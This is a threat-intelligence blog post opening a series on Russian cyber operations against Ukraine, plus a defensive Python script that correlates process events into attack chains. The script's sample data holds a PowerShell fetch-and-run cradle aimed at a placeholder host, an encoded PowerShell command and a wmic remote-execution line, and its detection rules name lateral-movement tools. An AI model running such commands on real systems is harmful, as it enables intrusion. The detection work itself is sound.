
Three Years of Cyber Warfare: How Digital Attacks Have Shaped the Russia-Ukraine War

As the third anniversary of Russia's full-scale invasion of Ukraine approaches, Trustwave SpiderLabs has created a series of blog posts to look back on, reflect upon, and explain how this 21st century war is being fought not just on the ground, in the air, and at sea, but also in cyberspace.

This last battlefield extends far beyond Russian and Ukrainian borders: each side's national cyber forces and affiliated groups take the fight not only directly to their adversary but also to the countries and organizations that support it, hoping to gain an advantage on the front lines.

In this series, Trustwave SpiderLabs examines the dozens of threat groups involved, details how they conduct their operations, the tricks and malware each leverages, and what they hope to accomplish. It also examines how these attackers strike operational technology across industry sectors such as technology and critical infrastructure.

These groups include the well-known, like APT44 and Turla on the Russian side, and names not normally mentioned in the press, such as the pro-Ukrainian Core Werewolf.

Trustwave SpiderLabs offers examples of the communications attackers post on messaging platforms like Telegram and Signal, where they often brag of alleged successes or publish exfiltrated data.

Key Findings

Some of the findings we will be covering in this series include:

  • In-depth looks at cyber warfare groups like Core Werewolf and Sticky Werewolf, two groups supporting Ukraine that have targeted Russian facilities with backdoors like UltraVNC and Ozone. On the Russian side, we will look at the Sandworm group, which has been elevated to the status of a named Advanced Persistent Threat (APT) as APT44, as well as XakNet and CyberArmyofRussia_Reborn, groups focused on disruption and DDoS.
  • Zero-day exploits like the one used on Android devices by Russia's APT29 to distribute spyware.
  • Malware like the WhiteCat log cleaner used by APT44 in attacks on telecommunications providers, and AcidPour, which SpiderLabs investigated as a purported successor to the AcidRain wiper used in the attack against satellite communications provider Viasat in February 2022.
  • Old TTPs, like attacks targeting Ukrainian telecommunications providers, and new TTPs, like a shift toward attacks on cloud and Wi-Fi-based assets.

Russian Cyber Operations Against Ukraine

To kick off this series, we’re going to focus on Russian cyber-attacks against Ukraine. Throughout 2024 and into 2025, Russian cyber operations have continued to play a critical role in its strategy against Ukraine, reflecting a well-coordinated, state-sponsored approach to cyber warfare. Russian attacks are typically conducted by APT groups, such as APT44 (Sandworm), APT28 (Fancy Bear), and Gamaredon, often operating under the direction of Russian intelligence agencies. These operations aim to disrupt critical infrastructure, steal sensitive data, and undermine Ukraine’s government and public morale.

Image 1: Cyberattacks Targeting Ukraine and Supporting Countries

Key Differences Between Russian and Ukrainian Cyber Operations

Russian cyberattacks are defined by their scale, coordination, and technical sophistication. Backed by state resources, Russian operations often involve zero-day vulnerabilities, custom malware, and long-term espionage campaigns. Unlike the decentralized attacks conducted by the Ukrainian side, Russian operations are centrally controlled, enabling highly organized and precise strikes on critical targets. Visibility into organizations operating in Russia is also very limited; the number of attacks reported against Russian targets is very small compared with the number attributed to Russian actors.

Russian attacks are also characterized by their dual-purpose strategies, combining disruption with data theft. For example, while some campaigns aim to sabotage Ukraine’s infrastructure, others focus on gathering intelligence to inform military operations or influence global perceptions through propaganda.


How Russian Actors Attack

Russian cyberattacks utilize a variety of methods tailored to disrupt Ukraine's critical infrastructure, government systems, and civilian morale:

  • Critical Infrastructure Attacks
    Russian groups have repeatedly targeted Ukraine’s power grids, telecommunications networks, and energy supply systems. These attacks aim to cause widespread disruptions, especially during winter, when energy dependency is highest. We will discuss this in-depth in the third part of this series.
  • Data Exfiltration and Espionage
    Russian APTs focus heavily on stealing sensitive data from Ukrainian government agencies, defense contractors, and NATO-aligned entities. This data is used for military intelligence, propaganda, and cyber-influence operations. We will discuss this in-depth in the second part of this series.
  • Destructive Malware
    Russian actors frequently deploy wiper malware to render systems inoperable. These attacks aim to paralyze the Ukrainian government and military operations. Examples: WhisperGate, HermeticWiper, and newer variants.
  • Ransomware Campaigns Disguised as Hacktivism
    Ransomware attacks attributed to Russian groups often aim to disrupt Ukrainian businesses and organizations. While ransom demands are sometimes made, these attacks are often politically motivated and meant to cause operational chaos.
  • Distributed Denial-of-Service (DDoS) Attacks
    Massive DDoS campaigns are frequently launched against Ukrainian government websites, banks, and critical infrastructure to disrupt communication and essential services. Pro-Russian groups also capitalize on political events to target Ukraine's external partners and supporters, framing these attacks as retaliation for that support.
  • Phishing and Social Engineering
    Russian actors use sophisticated phishing campaigns to target Ukrainian officials, military personnel, and businesses, aiming to gain initial access to secure networks.


Vitally Needed Information

Understanding these operations is crucial for defenders of critical infrastructure worldwide. While Russian Advanced Persistent Threats (APTs) are highly sophisticated, their methods, such as exploiting zero-day vulnerabilities, are also used by cybercriminals. For example, the CL0P group exploited the MOVEit Transfer vulnerability (CVE-2023-34362), and Lockbit targeted GoAnywhere MFT (CVE-2023-0669), affecting hundreds of organizations.

Russian APT tactics include spear-phishing, social engineering, lateral movement, and Living Off the Land (LotL) techniques, alongside off-the-shelf tools like Masscan, Metasploit, and Cobalt Strike. Detecting attack chains and anomalous behavior, not just known indicators, is essential.
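The point about attack chains is easier to see in code than in prose. The script below is an added example written for this post, not a Trustwave tool, and it runs over constructed Sysmon-style process-creation events with hypothetical hostnames. Each rule on its own (an Office document spawning PowerShell, an encoded PowerShell command, `net view`, `wmic /node:`) is noisy and fires on routine administration; the alert is raised only when several stages appear in kill-chain order on one host within a time window.

```python
"""Correlate process-creation telemetry into ordered attack chains.

Illustrative code written for this post, not a Trustwave tool. The event
records are constructed, Sysmon-style process-creation events with
hypothetical hostnames, and the stage rules are deliberately coarse.
"""
from datetime import datetime, timedelta
import re

# Kill-chain order we expect stages to appear in on a single host.
STAGE_ORDER = ["initial_access", "execution", "discovery", "lateral_movement"]
WINDOW = timedelta(hours=2)   # how long a chain may span on one host
MIN_STAGES = 3                # alert only when this many stages line up

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe", "rundll32.exe"}
SCANNERS = {"masscan.exe", "nmap.exe"}


def stage_of(ev):
    """Map one process-creation event to a kill-chain stage, or None.

    Each rule is weak evidence by itself: 'net view' is routine admin work
    and encoded PowerShell is used by legitimate tooling. The signal comes
    from several stages appearing in order on the same host.
    """
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"].lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        return "initial_access"      # document spawning a script host
    if image == "powershell.exe" and re.search(r"\s-(e|ec|enc|encodedcommand)\s", cmd):
        return "execution"           # encoded PowerShell one-liner
    if image in SCANNERS or re.search(r"\bnet\s+view\b|\bnltest\b.*/dclist", cmd):
        return "discovery"           # network or domain enumeration
    if re.search(r"wmic\b.*/node:|\bpsexec|winrs\b.*-r:|invoke-command\b.*-computername", cmd):
        return "lateral_movement"    # remote execution on another host
    return None


def standalone_hits(events):
    """How many alerts naive per-event rules would raise (for comparison)."""
    return sum(1 for ev in events if stage_of(ev))


def find_chains(events):
    """Return {host: [stages]} for hosts whose tagged events form an
    ordered chain of at least MIN_STAGES distinct stages within WINDOW."""
    by_host = {}
    for ev in events:
        stage = stage_of(ev)
        if stage:
            by_host.setdefault(ev["host"], []).append((ev["time"], stage))
    alerts = {}
    for host, tagged in by_host.items():
        tagged.sort()
        best = []
        for i, (t0, _) in enumerate(tagged):
            chain = []
            for t, stage in tagged[i:]:
                if t - t0 > WINDOW:
                    break
                # keep only stages that advance the chain; repeats and
                # out-of-order stages are ignored rather than penalised
                if not chain or STAGE_ORDER.index(stage) > STAGE_ORDER.index(chain[-1]):
                    chain.append(stage)
            if len(chain) > len(best):
                best = chain
        if len(best) >= MIN_STAGES:
            alerts[host] = best
    return alerts


def _ev(host, ts, parent, image, cmdline):
    return {"host": host, "time": datetime.fromisoformat(ts),
            "parent": parent, "image": image, "cmdline": cmdline}


# Constructed sample telemetry (hypothetical hosts, not real incident data).
SAMPLE_EVENTS = [
    # WS-FIN-07: a full chain in under an hour
    _ev("WS-FIN-07", "2025-02-10T09:02:11", "winword.exe", "powershell.exe",
        "powershell.exe -nop -w hidden -c iex (new-object net.webclient)"
        ".downloadstring('http://example.invalid/a')"),
    _ev("WS-FIN-07", "2025-02-10T09:03:40", "powershell.exe", "powershell.exe",
        "powershell.exe -nop -enc SQBFAFgA"),
    _ev("WS-FIN-07", "2025-02-10T09:15:05", "cmd.exe", "net.exe", "net view /domain"),
    _ev("WS-FIN-07", "2025-02-10T09:41:22", "cmd.exe", "wmic.exe",
        'wmic /node:"SRV-FILE-01" process call create "cmd.exe /c whoami"'),
    # SRV-ADM-02: routine admin enumeration and nothing else
    _ev("SRV-ADM-02", "2025-02-10T10:00:00", "cmd.exe", "net.exe", "net view"),
    _ev("SRV-ADM-02", "2025-02-10T10:05:00", "cmd.exe", "nltest.exe", "nltest /dclist:corp"),
    # WS-HR-03: two stages, out of order and ten hours apart
    _ev("WS-HR-03", "2025-02-09T08:00:00", "cmd.exe", "wmic.exe",
        "wmic /node:SRV-FILE-01 os get caption"),
    _ev("WS-HR-03", "2025-02-09T18:30:00", "excel.exe", "cmd.exe", "cmd.exe /c calc.exe"),
]

if __name__ == "__main__":
    print("per-event hits:", standalone_hits(SAMPLE_EVENTS))
    for host, chain in find_chains(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {' -> '.join(chain)}")
```

On the sample data the per-event rules fire eight times across three hosts, while the chain correlation raises a single alert for WS-FIN-07. In a real SIEM the stage rules would be far richer and the window tuned per environment, but the structure is the same: correlate by host and order, and let weak signals reinforce each other instead of alerting on each one.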

Lessons from state-sponsored attacks should guide security practices across industries. Countering Russian APTs goes beyond immediate threats—it's about strengthening defenses against a broad range of cyber adversaries in an ever-evolving threat landscape.

Please join us next week for the rest of the series.
